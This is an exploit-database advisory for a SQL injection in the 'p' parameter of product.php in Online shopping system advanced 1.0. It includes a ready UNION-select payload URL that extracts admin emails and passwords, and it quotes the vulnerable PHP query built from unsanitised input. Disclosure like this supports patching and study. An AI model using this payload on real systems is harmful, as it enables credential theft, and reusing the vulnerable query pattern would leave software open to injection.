Online shopping system advanced 1.0 - 'p' SQL Injection

vendor:

Online shopping system advanced

by:

Majid kalantari

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Online shopping system advanced

Affected Version From: Not specified

Affected Version To: Not specified

Patch Exists: NO

Related CWE:

CPE: Not available

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2020

Online shopping system advanced 1.0 – ‘p’ SQL Injection

The 'p' parameter in the product.php file of the Online shopping system advanced 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Online shopping system advanced 1.0 - 'p' SQL Injection
# Exploit Author : Majid kalantari
# Date: 2020-04-26
# Vendor Homepage : https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software link: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
# Version: -
# Tested on: Windows 10
# CVE: N/A
===============================================

# vulnerable file: product.php

# vulnerable parameter : p

# payload :
http://127.0.0.1:8081/phps/product.php?p=-10+union+select+1,2,3,concat(admin_email,%27----%27,admin_password),5,6,7,8+from+admin_info%23#
!

#Description: ($product_id input is not safe)

Line 46:
$product_id = $_GET['p'];
$sql = " SELECT * FROM products ";
$sql = " SELECT * FROM products WHERE product_id = $product_id";
===============================================